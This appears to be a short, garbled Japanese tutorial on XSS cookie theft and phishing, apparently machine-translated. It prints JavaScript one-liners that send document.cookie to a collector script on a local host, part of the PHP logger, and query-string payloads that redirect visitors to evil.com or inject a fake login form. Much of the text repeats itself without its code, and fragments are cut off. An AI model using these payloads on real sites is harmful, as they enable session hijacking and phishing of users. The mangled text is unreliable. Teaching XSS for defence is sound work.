XSS(二)--Cookie攻撃
2392 ワード
Cookieを操作してcookieを作成するには、cookieの名前、値、期限切れ、関連パスなどを指定する必要があります.
クッキー変数userを作成する役割を果たしますid,値123
開発者ツールに
がポップアップされます.
クライアントクッキー情報の取得
クッキー情報の受信
ネット釣り仮定ページには以下のコードがあります.
Googleへのアクセス要求はbaiduに指向されます
XSSリダイレクトフィッシング(XSS Redirect Phishing)仮定www.test.comにはxssがあります.
ではexploitが下の場合、ユーザーは現在のサイトから釣りサイトにジャンプします.
HTML注入釣り(XSS HTML Inject Phishing)の例:
効果
クッキー変数userを作成する役割を果たしますid,値123
開発者ツールに
javascripit:alert(document.cookie)と入力して実行すると、現在のクッキー情報
がポップアップされます.クライアントクッキー情報の取得
document.location="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie
new image().src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie
document.write('<img src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie+ "width=0 height=0 border=0 />" ');
クッキー情報の受信
");
fclose($log);
??>
ネット釣り仮定ページには以下のコードがあります.
http://www.google.com/
Googleへのアクセス要求はbaiduに指向されます
XSSリダイレクトフィッシング(XSS Redirect Phishing)仮定www.test.comにはxssがあります.
http://www.test.com/index.php?search=[exploit]
ではexploitが下の場合、ユーザーは現在のサイトから釣りサイトにジャンプします.
http://www.test.com/index.php?search=" '>document.location.href="http://www.evil.com/"
HTML注入釣り(XSS HTML Inject Phishing)の例:
http://www.test.com/index.php?search="'login
効果
